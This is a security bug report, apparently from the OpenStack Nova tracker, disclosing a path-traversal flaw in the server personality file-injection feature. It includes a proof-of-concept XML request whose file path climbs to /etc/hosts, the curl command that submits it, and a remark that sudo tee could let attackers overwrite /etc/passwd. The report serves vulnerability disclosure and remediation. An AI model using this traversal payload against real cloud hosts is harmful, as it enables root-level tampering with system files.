Comment 0 for bug 1015531

Mathias Weckbecker from SUSE Security Team reported the following:

------------------
During our internal security audit efforts at SUSE for openstack, I have found
an issue in openstack-nova (compute).

Quoting from [1] (comment #1):

Vulnerable code (quoted), /usr/lib64/python2.6/site-packages/nova/utils.py:
[... snipped copy of utils.execute code ...]

It's already doing lots of things correctly, like e.g. calling Popen with
the first parameter being a list, still it is affected by traversal flaws.

Testcase (also from [1], comment #0):

mweckbecker@s3gfault:~$ cat newserver.xml
<?xml version="1.0" encoding="UTF-8"?>
<server xmlns="http://docs.openstack.org/compute/api/v1.1"
imageRef="http://anonymi.arch.suse.de:8774/985b88ae99474d6d90501870499a063f/images/2d583dfb-000a-4332-9264-ed57ce186f1d"
        flavorRef="6"
        name="new-server-test">
  <metadata>
    <meta key="My Server Name">foobar</meta>
  </metadata>
  <personality>
    <file path="../../../../../../../../../../../../../etc/hosts">
        ICAgICAgDQoiQSBjbG91ZCBkb2VzIG5vdCBrbm93IHdoeSBp
        dCBtb3ZlcyBpbiBqdXN0IHN1Y2ggYSBkaXJlY3Rpb24gYW5k
        IGF0IHN1Y2ggYSBzcGVlZC4uLkl0IGZlZWxzIGFuIGltcHVs
        c2lvbi4uLnRoaXMgaXMgdGhlIHBsYWNlIHRvIGdvIG5vdy4g
        QnV0IHRoZSBza3kga25vd3MgdGhlIHJlYXNvbnMgYW5kIHRo
        ZSBwYXR0ZXJucyBiZWhpbmQgYWxsIGNsb3VkcywgYW5kIHlv
        dSB3aWxsIGtub3csIHRvbywgd2hlbiB5b3UgbGlmdCB5b3Vy
        c2VsZiBoaWdoIGVub3VnaCB0byBzZWUgYmV5b25kIGhvcml6
        b25zLiINCg0KLVJpY2hhcmQgQmFjaA==
    </file>
  </personality>
</server>

mweckbecker@s3gfault:~$ curl -v
"http://anonymi.arch.suse.de:8774/v2/985b88ae99474d6d90501870499a063f/servers"
-H"X-Auth-Token:ef7d5faf9d864c048afce0cf6a3a3c15"
-H"Content-type:application/xml" -H"Accept:application/xml" -d @newserver.xml

Additional note: This beast is calling tee with sudo, potentially allowing
attackers to even alter files such as /etc/passwd.

[1] https://bugzilla.novell.com/show_bug.cgi?id=767687

Thanks, Matthias